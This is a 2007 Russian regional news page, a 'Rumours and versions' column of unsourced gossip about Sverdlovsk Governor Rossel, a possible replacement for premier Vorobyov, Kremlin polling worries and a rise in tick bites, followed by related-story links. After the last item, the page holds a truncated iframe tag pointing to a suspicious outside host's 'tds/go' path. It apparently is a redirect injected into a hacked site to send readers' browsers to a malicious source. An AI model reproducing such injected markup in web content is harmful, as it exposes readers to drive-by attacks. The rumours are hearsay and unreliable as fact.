18.05.2007, 16:50

Слухи и версии, 18 мая

Начался подбор кандидатов на место Воробьева
Говорят, что администрация губернатора начала подбор кандидатов на место Алексея Воробьева. Пойти на этот шаг команду Эдуарда Росселя заставило то, что региональные элиты уже не верят в возвращение премьера, практически каждый месяц уходящего в отпуск.
По неофициальной информации, открытие неформального кастинга на второй по значимости пост в области с энтузиазмом восприняли и ФПГ, работающие в регионе, и чиновники, многие из которых рассчитывают на то, что со сменой главы правительства, руководящего кабинетом министров уже 11 лет, им удастся улучшить свои карьерные позиции.
Сам же Воробьев, по неофициальной информации, отстоять свое кресло не пытается. Не исключено, что премьеру предложат место в избирательном списке «Единой России» на предстоящих выборах в Госдуму. Благо процесс их согласования только начинается.
ГИБДД отказалась перекрывать улицы в день открытия Российского экономического форума
Говорят, что руководство Госавтоинспекции отказалось перекрывать улицы Екатеринбурга из-за проходящего в областном центре Российского экономического форума.
По неофициальной информации, оргкомитет мероприятия обращался в инспекцию с просьбой подготовиться к обеспечению беспрепятственного проезда участников мероприятия. Однако в ГИБДД, ознакомившись со списком участников, в неофициальном порядке заявили, что ни одной статусной персоны на форуме нет, поэтому никаких эктраординарных мер автоинспекция предпринимать не будет.
В Кремле озабочены результатами мониторинга настроений в регионах
Говорят, что в Кремле серьезно озабочены результатами мониторинга настроений в регионах. Последние поездки по стране лиц, которые, по общему мнению, близки к президентской администрации, и их общение с политиками и журналистами показали, что отношение ко многим проектам Кремля в регионах достаточно скептическое.
Так, посетивший Екатеринбург главный редактор журнала «Эксперт» Валерий Фадеев, как говорят, явно не ожидал, что во время практически всех проведенных встреч обнаружит столько «несогласных», причем в среде не радикально настроенной молодежи, а в депутатском корпусе и среди представителей медиабизнеса.
Оказалось, что уральские собеседники Фадеева не в восторге от того, как в современной России строится диалог СМИ и власти, не собираются дружно поддерживать «Единую Россию» и вообще имеют по целому ряду вопросов мнение, которое мягко говоря отличается от позиции Кремля.
Россель устроил разнос подчиненным
Говорят, что губернатор на минувшей неделе устроил форменный разнос чиновникам своей администрации. По неофициальной информации, в одной из официозных телепрограмм Эдуард Россель случайно увидел сюжет, в котором областные депутаты разбирали работу управляющих округами. Результаты разбора оказались неутешительными. Для губернатора стало откровением, что его управляющие на местах имеют право лишь контролировать исполнение программы «Родники» и заниматься безнадзорными детьми.
Не секрет, что глава региона всегда гордился тем, что ввел систему управленческих округов еще в 1997 году, и искренне полагал, что его управляющие — влиятельные и уважаемые люди. Узнав, что никаких рычагов влияния у них нет, губернатор пришел в бешенство.
Как говорят слухмейкеры, на следующий день Эдуард Россель высказал своим подчиненным все, что он думает об их деловых качествах, и потребовал как-то увеличить аппаратный вес префектов.
Медики Свердловской области затребовали рекордные объемы антиклещевых препаратов
Говорят, что количество укушенных клещами в этом году будет рекордным. Причиной этого стал срыв плановой обработки лесопарков из-за дождливой погоды.
По неофициальной информации, медики уже готовятся к тому, что наплыв пациентов значительно превысит показатели последних лет, и уже затребовали рекордные объемы антиклещевых препаратов.
<iframe src="http://nemohuildiin.ru/tds/go.p

Похожие новости по теме
11.09.2009, 15:40

Слухи и версии, 11 сентября

Эдуард Россель готов отказаться от последнего Говорят, что Эдуард Россель в борьбе за должность губернатора Свердловской области готов отказаться от последних своих «завоеваний»...

21.08.2009, 16:15

Слухи и версии, 21 августа

Эдуард Россель расстроен молчанием VIP-ов Говорят, что Эдуард Россель не на шутку расстроен молчанием, с которым встретили решение генерального совета единороссов разного рода VIP-персоны. По...

10.07.2009, 16:53

Слухи и версии, 10 июля

Эдуард Россель и Александр Левин решили поэкспериментировать над Виктором Кокшаровым Говорят, что решение губернатора Эдуарда Росселя и главы его администрации Александра Левина уйти в отпуск...

20.06.2008, 16:07

Слухи и версии, 20 июня

Доступ в «Справедливую Россию» перекрыт Говорят, что со сменой президента и перестановками в его администрации положение дел с партией «Справедливая Россия» только ухудшилось. По неофициальной...

11.01.2008, 15:44

Слухи и версии, 11 января

В администрации губернатора расстроены невысокой активностью кандидатов в ППЗС Говорят, что в администрации губернатора серьезно расстроены тем, как вяло развивается кампания по выдвижению кандидатов...


Мастрид
Погода на неделю
Популярные новости
Новости по дням
Новости по месяцам